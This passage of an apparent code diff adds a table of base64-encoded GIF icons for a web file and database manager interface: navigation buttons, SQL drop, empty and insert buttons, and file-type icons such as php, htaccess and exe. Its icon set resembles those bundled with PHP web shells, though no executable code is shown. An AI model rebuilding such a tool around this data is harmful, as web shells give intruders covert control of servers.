+"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4". 
+"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G". 
+"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ". 
+"jwVFHBgiEGQFIgQasYkcSbJQIAA7", 
+"download"=> 
+"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu". 
+"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=", 
+"forward"=> 
+"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". 
+"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt". 
+"WqsJADs=", 
+"home"=> 
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS". 
+"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j". 
+"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=", 
+"mode"=> 
+"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO". 
+"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/". 
+"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=", 
+"refresh"=> 
+"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA". 
+"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY". 
+"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ". 
+"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=", 
+"search"=> 
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//". 
+"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap". 
+"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD". 
+"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr". 
+"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==", 
+"setup"=> 
+"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC". 
+"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". 
+"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB". 
+"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE". 
+"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==", 
+"small_dir"=> 
+"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp". 
+"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", 
+"small_unk"=> 
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U". 
+"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo". 
+"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31". 
+"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4". 
+"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP". 
+"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz". 
+"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ". 
+"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io". 
+"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz". 
+"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM". 
+"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC". 
+"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj". 
+"yAsokBkQADs=", 
+"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR". 
+"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==", 
+"sort_asc"=> 
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa". 
+"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==", 
+"sort_desc"=> 
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb". 
+"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=", 
+"sql_button_drop"=> 
+"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". 
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". 
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". 
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". 
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". 
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". 
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". 
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". 
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". 
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". 
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". 
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". 
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA". 
+"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/". 
+"AQEAOw==", 
+"sql_button_empty"=> 
+"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". 
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". 
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". 
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". 
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". 
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". 
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". 
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". 
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". 
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". 
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". 
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". 
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA". 
+"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==", 
+"sql_button_insert"=> 
+"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". 
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". 
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". 
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". 
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". 
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". 
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". 
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". 
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". 
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". 
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". 
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". 
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA". 
+"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=", 
+"up"=> 
+"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg". 
+"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV". 
+"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==", 
+"write"=> 
+"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze". 
+"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61". 
+"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==", 
+"ext_asp"=> 
+"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/". 
+"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI". 
+"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=", 
+"ext_mp3"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". 
+"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". 
+"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", 
+"ext_avi"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM". 
+"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4". 
+"PYXCyg+V2i44XeRmSfYqsGhAAgA7", 
+"ext_cgi"=> 
+"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9". 
+"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6". 
+"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S". 
+"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ". 
+"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM". 
+"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD". 
+"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi". 
+"RYtMAgEAOw==", 
+"ext_cmd"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI". 
+"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN". 
+"dmrYAMn1onq/YKpjvEgAADs=", 
+"ext_cpp"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC". 
+"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra". 
+"Eq7YrLDE7a4SADs=", 
+"ext_ini"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL". 
+"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM". 
+"SnEjgPVarHEHgrB43JvszsQEADs=", 
+"ext_diz"=> 
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs". 
+"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv". 
+"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3". 
+"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr". 
+"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX". 
+"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA". 
+"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW". 
+"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK". 
+"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm". 
+"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg". 
+"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF". 
+"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA". 
+"Ow==", 
+"ext_doc"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR". 
+"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq". 
+"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=", 
+"ext_exe"=> 
+"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7". 
+"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt". 
+"xhIAOw==", 
+"ext_h"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB". 
+"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo". 
+"Wq/NknbbSgAAOw==", 
+"ext_hpp"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF". 
+"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR". 
+"UqUagnbLdZa+YFcCADs=", 
+"ext_htaccess"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6". 
+"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ". 
+"AAA7", 
+"ext_html"=> 
+"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz". 
+"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P". 
+"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk". 
+"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR". 
+"ADs=", 
+"ext_jpg"=> 
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci". 
+"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd". 
+"FxEAOw==", 
+"ext_js"=> 
+"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH". 
+"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs". 
+"a00AjYYBbc/o9HjNniUAADs=", 
+"ext_lnk"=> 
+"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO". 
+"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi". 
+"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk". 
+"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG". 
+"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5". 
+"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf". 
+"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ". 
+"ADs=", 
+"ext_log"=> 
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN". 
+"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==", 
+"ext_php"=> 
+"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg". 
+"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==", 
+"ext_pl"=> 
+"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo". 
+"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7", 
+"ext_swf"=> 
+"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O". 
+"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". 
